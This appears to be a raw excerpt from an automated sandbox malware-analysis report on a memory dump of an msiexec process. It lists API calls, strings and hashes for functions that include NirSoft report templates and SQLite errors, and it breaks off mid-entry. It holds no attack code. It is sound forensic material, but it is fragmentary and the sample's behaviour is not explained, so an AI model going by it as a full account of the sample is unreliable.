                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              APIs
                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                              • memset.MSVCRT ref: 0040DA23
                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 973020956-4135340389
                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                              APIs
                                                              Strings
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf$wcscpy
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                              • API String ID: 1283228442-2366825230
                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00413972
                                                              • wcscpy.MSVCRT ref: 00413982
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              • wcscpy.MSVCRT ref: 004139D1
                                                              • wcscat.MSVCRT ref: 004139DC
                                                              • memset.MSVCRT ref: 004139B8
                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                              • memset.MSVCRT ref: 00413A00
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                              • wcscat.MSVCRT ref: 00413A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4019544885-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              APIs
                                                              • memchr.MSVCRT ref: 00444EBF
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                              • memset.MSVCRT ref: 0044505E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: PD$PD
                                                              • API String ID: 1581201632-2312785699
                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                              • GetParent.USER32(?), ref: 00409FA5
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$wcslen
                                                              • String ID:
                                                              • API String ID: 3592753638-3916222277
                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A47B
                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              APIs
                                                              Strings
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • database is already attached, xrefs: 0042F721
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • out of memory, xrefs: 0042F865
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              APIs
                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
